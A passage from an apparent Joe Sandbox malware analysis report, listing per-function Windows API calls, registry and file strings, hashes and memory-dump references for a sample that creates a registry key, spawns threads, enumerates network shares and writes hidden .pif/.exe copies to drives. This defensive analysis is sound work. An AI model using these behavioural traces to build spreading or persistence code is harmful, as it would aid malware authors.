                                                                                                                                                                                                                                    • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,000F003F,00000000), ref: 0128581D
                                                                                                                                                                                                                                    • RegCreateKeyA.ADVAPI32(80000001,00000000,00000000), ref: 01285845
                                                                                                                                                                                                                                    • RegEnumValueA.KERNEL32(00000000,00000000,00000000,00000104,00000000,00000000,00000000,00000000), ref: 01285896
                                                                                                                                                                                                                                    • RegCloseKey.KERNEL32(00000000), ref: 01285BFB
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2239813722.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001260000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001307000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.000000000130A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.000000000130D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001315000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_1260000_PfBjDhHzvV.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: CloseCreateEnumOpenValuelstrcpy
                                                                                                                                                                                                                                    • String ID: %c%d_%d$%c%d_%d$Software\Erlloywmr$fronC:\Windows\
                                                                                                                                                                                                                                    • API String ID: 4133318789-255879431
                                                                                                                                                                                                                                    • Opcode ID: 40215fcc4e2f6ac244779f903c0f7a73f6618e847fdfff03108a5a37570234a4
                                                                                                                                                                                                                                    • Instruction ID: 8023c3e36041d8c2214b75da696ee8de01f76b19db3a973d9837a04733cc6ef1
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 40215fcc4e2f6ac244779f903c0f7a73f6618e847fdfff03108a5a37570234a4
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4BC14874921228EBDF24DF54EC88BE9B7B5BB58314F1082C9D509A7290D7B4ABC4CF90
                                                                                                                                                                                                                                    Function 01294567 Relevance: 22.6, APIs: 15, Instructions: 143threadsleepnetworkCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • SetErrorMode.KERNEL32(00008002), ref: 0129457F
                                                                                                                                                                                                                                    • WSAStartup.WS2_32(00000002,?), ref: 0129458E
                                                                                                                                                                                                                                    • RtlInitializeCriticalSection.NTDLL(01299030), ref: 01294599
                                                                                                                                                                                                                                    • RtlInitializeCriticalSection.NTDLL(01299018), ref: 012945A4
                                                                                                                                                                                                                                    • RtlInitializeCriticalSection.NTDLL(01299050), ref: 012945AF
                                                                                                                                                                                                                                      • Part of subcall function 01293B60: LoadLibraryA.KERNEL32(01282154), ref: 01293C13
                                                                                                                                                                                                                                      • Part of subcall function 01293B60: GetProcAddress.KERNEL32(00000000,0128278C), ref: 01293C36
                                                                                                                                                                                                                                      • Part of subcall function 01293B60: GetProcAddress.KERNEL32(00000000,012827A0), ref: 01293C4E
                                                                                                                                                                                                                                      • Part of subcall function 01293B60: GetProcAddress.KERNEL32(00000000,012827B0), ref: 01293C67
                                                                                                                                                                                                                                      • Part of subcall function 01293B60: LoadLibraryA.KERNEL32(01282894), ref: 01293C79
                                                                                                                                                                                                                                      • Part of subcall function 01293B60: GetProcAddress.KERNEL32(00000000,012828D8), ref: 01293C9C
                                                                                                                                                                                                                                      • Part of subcall function 01293B60: GetProcAddress.KERNEL32(00000000,012828B0), ref: 01293CB5
                                                                                                                                                                                                                                      • Part of subcall function 01293B60: GetProcAddress.KERNEL32(00000000,012828C4), ref: 01293CCD
                                                                                                                                                                                                                                      • Part of subcall function 01293B60: GetProcAddress.KERNEL32(00000000,012828A0), ref: 01293CE6
                                                                                                                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,Function_000327D4,00000000,00000000,00000000), ref: 012945D2
                                                                                                                                                                                                                                      • Part of subcall function 012841C6: RtlEnterCriticalSection.NTDLL(01299030), ref: 012841D6
                                                                                                                                                                                                                                      • Part of subcall function 012841C6: RtlLeaveCriticalSection.NTDLL(01299030), ref: 01284260
                                                                                                                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,Function_00029EEA,00000000,00000000,?), ref: 012945F9
                                                                                                                                                                                                                                      • Part of subcall function 012841C6: CloseHandle.KERNEL32(00000000), ref: 01284247
                                                                                                                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,Function_0003392D,00000000,00000000,?), ref: 01294620
                                                                                                                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,Function_00028962,00000000,00000000,?), ref: 01294647
                                                                                                                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,Function_0002A2F5,00000000,00000000,?), ref: 0129466E
                                                                                                                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,Function_0002426A,00000000,00000000,?), ref: 01294695
                                                                                                                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,Function_00027A3A,00000000,00000000,?), ref: 012946BC
                                                                                                                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,Function_000283C9,00000000,00000000,?), ref: 012946E3
                                                                                                                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,Function_0002878B,00000000,00000000,?), ref: 0129470A
                                                                                                                                                                                                                                    • Sleep.KERNEL32(00000200), ref: 01294727
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2239813722.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001260000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001307000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.000000000130A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.000000000130D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001315000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_1260000_PfBjDhHzvV.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: CreateThread$AddressProc$CriticalSection$Initialize$LibraryLoad$CloseEnterErrorHandleLeaveModeSleepStartup
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 3135310872-0
                                                                                                                                                                                                                                    • Opcode ID: cfdcc725d695a1d5ebbddef2adf02339644189c078a027451bdc2f1abf96eb1c
                                                                                                                                                                                                                                    • Instruction ID: 2da3bf9190753b5b1c5fb8fc75bcee591b7acb00e3e76a19367df3e6650c3eda
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: cfdcc725d695a1d5ebbddef2adf02339644189c078a027451bdc2f1abf96eb1c
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: EE41DD72BE13457BFB30B691AD1FFA936289B54F01F204154FB09BD0C4AAF036549B6A
                                                                                                                                                                                                                                    Function 01291AB1 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 116stringsleepfileCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • WNetEnumResourceA.MPR(?,?,?,?), ref: 01291A92
                                                                                                                                                                                                                                    • lstrcpy.KERNEL32(?,00000000), ref: 01291B29
                                                                                                                                                                                                                                    • lstrcat.KERNEL32(?,01283D50), ref: 01291B38
                                                                                                                                                                                                                                    • lstrcpy.KERNEL32(?,?), ref: 01291B76
                                                                                                                                                                                                                                    • lstrlen.KERNEL32(?), ref: 01291B83
                                                                                                                                                                                                                                    • lstrcat.KERNEL32(?,01283D54), ref: 01291BA2
                                                                                                                                                                                                                                    • lstrlen.KERNEL32(?), ref: 01291BAF
                                                                                                                                                                                                                                    • lstrcat.KERNEL32(?,.tmp), ref: 01291BD1
                                                                                                                                                                                                                                    • lstrlen.KERNEL32(?,?,00000001,?,?,00000000), ref: 01291C2C
                                                                                                                                                                                                                                      • Part of subcall function 01291060: Sleep.KERNEL32(?,?), ref: 012910BF
                                                                                                                                                                                                                                      • Part of subcall function 01291060: lstrcat.KERNEL32(?,01283D20), ref: 012910DD
                                                                                                                                                                                                                                    • DeleteFileA.KERNEL32(?), ref: 01291C4B
                                                                                                                                                                                                                                    • Sleep.KERNEL32(00001000), ref: 01291C71
                                                                                                                                                                                                                                    • Sleep.KERNEL32(00002000), ref: 01291C92
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2239813722.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001260000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001307000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.000000000130A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.000000000130D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001315000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_1260000_PfBjDhHzvV.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: lstrcat$Sleeplstrlen$lstrcpy$DeleteEnumFileResource
                                                                                                                                                                                                                                    • String ID: .tmp
                                                                                                                                                                                                                                    • API String ID: 3940331287-2986845003
                                                                                                                                                                                                                                    • Opcode ID: e9deaf7069a120ee61c17aa4dbaa474b0e29ee4c7756f5aff45479e25707b44a
                                                                                                                                                                                                                                    • Instruction ID: 53f7f9f23b5eef75ec2c7c6e11ec0a7e278edb0cde8f6300a0c2ab25f1454723
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e9deaf7069a120ee61c17aa4dbaa474b0e29ee4c7756f5aff45479e25707b44a
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FD41BB71A1061A9FCF24DF58DC88FAB7B79AF84302F40C488EA0997184D732EA56CF50
                                                                                                                                                                                                                                    Function 01293238 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 133filestringtimeCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • Sleep.KERNEL32(00004E20), ref: 01293210
                                                                                                                                                                                                                                    • GetLogicalDrives.KERNEL32 ref: 01293220
                                                                                                                                                                                                                                    • GetDriveTypeA.KERNEL32(?), ref: 012932A3
                                                                                                                                                                                                                                    • lstrcat.KERNEL32(?,01282740), ref: 012932CA
                                                                                                                                                                                                                                    • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000020,00000000), ref: 012932E6
                                                                                                                                                                                                                                    • GetFileTime.KERNEL32(000000FF,?,?,?), ref: 0129331B
                                                                                                                                                                                                                                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 0129332F
                                                                                                                                                                                                                                    • ReadFile.KERNEL32(?,?,00000FA0,?,00000000), ref: 01293391
                                                                                                                                                                                                                                    • CharLowerA.USER32(?), ref: 0129339E
                                                                                                                                                                                                                                    • lstrlen.KERNEL32(?), ref: 012933AB
                                                                                                                                                                                                                                    • lstrcpy.KERNEL32(?,00000000), ref: 01293479
                                                                                                                                                                                                                                    • GetFileAttributesA.KERNEL32(?), ref: 01293486
                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 01293498
                                                                                                                                                                                                                                    • CreateFileA.KERNEL32(?,40000000,00000002,00000000,00000004,00000020,00000000), ref: 012934B4
                                                                                                                                                                                                                                    • WriteFile.KERNEL32(000000FF,?,?,?,00000000), ref: 012934E7
                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(000000FF), ref: 012934F4
                                                                                                                                                                                                                                    • SetFileAttributesA.KERNEL32(?,00000007), ref: 01293503
                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(000000FF), ref: 0129351C
                                                                                                                                                                                                                                    • GetFileAttributesA.KERNEL32(?), ref: 01293529
                                                                                                                                                                                                                                    • SetFileAttributesA.KERNEL32(?,00000020), ref: 01293547
                                                                                                                                                                                                                                    • DeleteFileA.KERNEL32(?), ref: 01293554
                                                                                                                                                                                                                                    • CreateFileA.KERNEL32(?,40000000,00000002,00000000,00000004,00000020,00000000), ref: 0129357F
                                                                                                                                                                                                                                    • GetSystemTime.KERNEL32(?), ref: 0129359F
                                                                                                                                                                                                                                    • SystemTimeToFileTime.KERNEL32(?,?), ref: 012935C8
                                                                                                                                                                                                                                    • lstrcat.KERNEL32(?,.pif), ref: 0129362B
                                                                                                                                                                                                                                    • lstrcat.KERNEL32(?,.exe), ref: 0129363F
                                                                                                                                                                                                                                    • lstrlen.KERNEL32(?,?,00000000), ref: 0129366B
                                                                                                                                                                                                                                    • WriteFile.KERNEL32(?,?,00000000), ref: 01293680
                                                                                                                                                                                                                                    • SetFileTime.KERNEL32(?,?,?,?), ref: 012936A2
                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 012936AF
                                                                                                                                                                                                                                    • SetFileAttributesA.KERNEL32(?,00000007), ref: 012936BE
                                                                                                                                                                                                                                    • CreateFileA.KERNEL32(?,40000000,00000002,00000000,00000004,00000020,00000000), ref: 012936DA
                                                                                                                                                                                                                                    • WriteFile.KERNEL32(000000FF,?,?,?,00000000), ref: 0129370D
                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(000000FF), ref: 0129371A
                                                                                                                                                                                                                                    • SetFileAttributesA.KERNEL32(?,00000007), ref: 01293729
                                                                                                                                                                                                                                    • Sleep.KERNEL32(00001B58), ref: 01293739
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2239813722.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001260000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001307000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.000000000130A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.000000000130D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001315000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_1260000_PfBjDhHzvV.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: File$Time$Attributes$CloseHandle$Create$SystemWritelstrcat$Sleeplstrlen$CharDeleteDriveDrivesLogicalLowerReadTypelstrcpy
                                                                                                                                                                                                                                    • String ID: :$\
                                                                                                                                                                                                                                    • API String ID: 3104407473-1166558509
                                                                                                                                                                                                                                    • Opcode ID: 69433a1008c9aefb1182c4d34c8edb5c1756a00f1df97130fe55635d87e05d59
                                                                                                                                                                                                                                    • Instruction ID: a33085c4652c0a1cbe55f032bbcf4928b65f73a2e4266055c9bad0d3deef8110
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 69433a1008c9aefb1182c4d34c8edb5c1756a00f1df97130fe55635d87e05d59
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 71518D75D10269DBDF39CB68DC84AEEB776BB89301F0481D9E209E6184D734AAA5CF10
                                                                                                                                                                                                                                    Function 0129174A Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 132registrysleepstringCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • Sleep.KERNEL32(00001000,?,?,?,00000000,01298090,01283FF8,000000FF,?,01293AFC,80000001), ref: 012917D9
                                                                                                                                                                                                                                    • wsprintfA.USER32 ref: 012917F8
                                                                                                                                                                                                                                    • RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 0129181A
                                                                                                                                                                                                                                    • RegEnumValueA.KERNEL32(?,00000000,?,000000FF,00000000,00000000,?,000000FF), ref: 01291894
                                                                                                                                                                                                                                    • lstrlen.KERNEL32(?), ref: 012918C4
                                                                                                                                                                                                                                    • lstrlen.KERNEL32(00000000), ref: 012918D0
                                                                                                                                                                                                                                    • Sleep.KERNEL32(00000400), ref: 01291912
                                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 01291928
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2239813722.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001260000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001307000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.000000000130A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.000000000130D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001315000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_1260000_PfBjDhHzvV.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Sleeplstrlen$CloseEnumOpenValuewsprintf
                                                                                                                                                                                                                                    • String ID: %s%s
                                                                                                                                                                                                                                    • API String ID: 1665585142-3252725368
                                                                                                                                                                                                                                    • Opcode ID: 7c96ab623070f5cac4757a96a0a2bf7b8e929b6aee19e8be0775f228178ae69c
                                                                                                                                                                                                                                    • Instruction ID: 26815dcd9cda5024410f6e2525d85f21b15d4ae610e2d6b4ca570aabd8f90fdf
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7c96ab623070f5cac4757a96a0a2bf7b8e929b6aee19e8be0775f228178ae69c
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E2517471D10219AFDB20DF98DC89BEEB7B4FB48714F0081D9E609A7280D779AA54CF90
                                                                                                                                                                                                                                    Function 012855BE Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 99filestringmemoryCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • CreateFileA.KERNEL32(C:\Windows\mqiwauwsp.log,80000000,00000001,00000000,00000003,00000080,00000000), ref: 01285637
                                                                                                                                                                                                                                    • GetFileSize.KERNEL32(000000FF,00000000), ref: 01285659
                                                                                                                                                                                                                                    • GlobalAlloc.KERNEL32(00000040,00000000), ref: 01285691
                                                                                                                                                                                                                                    • ReadFile.KERNEL32(000000FF,00000000,00000400,00000000,00000000), ref: 012856BB
                                                                                                                                                                                                                                    • lstrcpy.KERNEL32(00000000,C:\Windows\mqiwauwsp.log), ref: 012856CD
                                                                                                                                                                                                                                    • lstrlen.KERNEL32(00000000,00000000), ref: 012856E1
                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(000000FF), ref: 01285725
                                                                                                                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 01285755
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2239813722.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001260000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001307000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.000000000130A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.000000000130D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001315000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_1260000_PfBjDhHzvV.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: File$Global$AllocCloseCreateFreeHandleReadSizelstrcpylstrlen
                                                                                                                                                                                                                                    • String ID: C:\Windows\mqiwauwsp.log
                                                                                                                                                                                                                                    • API String ID: 1499523542-564371081
                                                                                                                                                                                                                                    • Opcode ID: c652846fbf8f9665e1c04c108a3bb0fc6ef2be19b865dbdc1a84aa0a59dee1c0
                                                                                                                                                                                                                                    • Instruction ID: 2cb79f670399e3fa34f0dec1665d99f3b3752f04668bba1aabffd3b84005ccab
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c652846fbf8f9665e1c04c108a3bb0fc6ef2be19b865dbdc1a84aa0a59dee1c0
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 53418FB195021CEBDB20EB54DC8DBDAB778AB54300F1086D8E319A61D1D7B46AC4CF90
                                                                                                                                                                                                                                    Function 0128A553 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 76stringCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 0128A599
                                                                                                                                                                                                                                    • GetPrivateProfileStringA.KERNEL32(01282114,01282660,00000000,00000000,00000080,012826C0), ref: 0128A5C5
                                                                                                                                                                                                                                    • lstrlen.KERNEL32(00000000), ref: 0128A5D2
                                                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 0128A5EA
                                                                                                                                                                                                                                    • wsprintfA.USER32 ref: 0128A635
                                                                                                                                                                                                                                    • WritePrivateProfileStringA.KERNEL32(01282114,01282660,?,012826C0), ref: 0128A65A
                                                                                                                                                                                                                                    • lstrcpy.KERNEL32(46390628699,00000000), ref: 0128A66C
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2239813722.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001260000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001307000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.000000000130A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.000000000130D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001315000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_1260000_PfBjDhHzvV.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: CountPrivateProfileStringTick$Writelstrcpylstrlenwsprintf
                                                                                                                                                                                                                                    • String ID: 46390628699
                                                                                                                                                                                                                                    • API String ID: 929466507-4273875350
                                                                                                                                                                                                                                    • Opcode ID: 2cb5467c87e97f46aa88e544f78942667de664184def023bf785ae34784acb53
                                                                                                                                                                                                                                    • Instruction ID: c984b6a241145a7fa33b611e8183e983c39ae729aaf93c0b660f70361c731d23
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2cb5467c87e97f46aa88e544f78942667de664184def023bf785ae34784acb53
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 31317176500115EFDB24DB68E858BE677B9EB88300F00C1D9F209932D8DF746A948F90
                                                                                                                                                                                                                                    Function 01288962 Relevance: 13.8, APIs: 9, Instructions: 250sleepthreadCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • Sleep.KERNEL32(0002BF20), ref: 01288A14
                                                                                                                                                                                                                                      • Part of subcall function 012844CB: InterlockedExchange.KERNEL32(012990C0,0128A192), ref: 012844E9
                                                                                                                                                                                                                                    • Sleep.KERNEL32 ref: 01288A33
                                                                                                                                                                                                                                    • IsBadWritePtr.KERNEL32(00000110,00000000), ref: 01288B3E
                                                                                                                                                                                                                                    • Sleep.KERNEL32(00001770), ref: 01288B8E
                                                                                                                                                                                                                                    • Sleep.KERNEL32(0001D4C0), ref: 01288BB0
                                                                                                                                                                                                                                    • Sleep.KERNEL32(004B001E), ref: 01288D9D
                                                                                                                                                                                                                                    • RtlExitUserThread.NTDLL(00000000), ref: 01288DD0
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2239813722.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001260000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001307000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.000000000130A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.000000000130D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001315000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_1260000_PfBjDhHzvV.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Sleep$ExchangeExitInterlockedThreadUserWrite
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 702981705-0
                                                                                                                                                                                                                                    • Opcode ID: 2cf8e6e9c25b82293518b3da080261123cf861e6410c378f18f56195f01281cf
                                                                                                                                                                                                                                    • Instruction ID: 603df6cbc282b342b8f70ec1717974a771075d5e882600879bbcd2d2d8b696c1
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2cf8e6e9c25b82293518b3da080261123cf861e6410c378f18f56195f01281cf
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 78B1D4B1A12119CBDB34EF18CC947E9B7B5FB84304F4484EAD209A6286D7756EC4CF98
                                                                                                                                                                                                                                    Function 0128878B Relevance: 12.1, APIs: 8, Instructions: 83sleepthreadCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • Sleep.KERNEL32(000493E0), ref: 012887D1
                                                                                                                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,012884C1,00000000,00000000,00000000), ref: 0128885C
                                                                                                                                                                                                                                      • Part of subcall function 012841C6: RtlEnterCriticalSection.NTDLL(01299030), ref: 012841D6
                                                                                                                                                                                                                                      • Part of subcall function 012841C6: RtlLeaveCriticalSection.NTDLL(01299030), ref: 01284260
                                                                                                                                                                                                                                    • Sleep.KERNEL32(00000200), ref: 01288870
                                                                                                                                                                                                                                    • Sleep.KERNEL32(00000100), ref: 01288884
                                                                                                                                                                                                                                    • Sleep.KERNEL32(00000100), ref: 0128889F
                                                                                                                                                                                                                                    • Sleep.KERNEL32(00000400), ref: 012888BD
                                                                                                                                                                                                                                    • Sleep.KERNEL32(00249F00), ref: 012888D7
                                                                                                                                                                                                                                    • RtlExitUserThread.NTDLL(00000000), ref: 012888E4
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2239813722.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001260000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001307000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.000000000130A000.00000040.00001000.00020000.00000000.sdmpDownload File
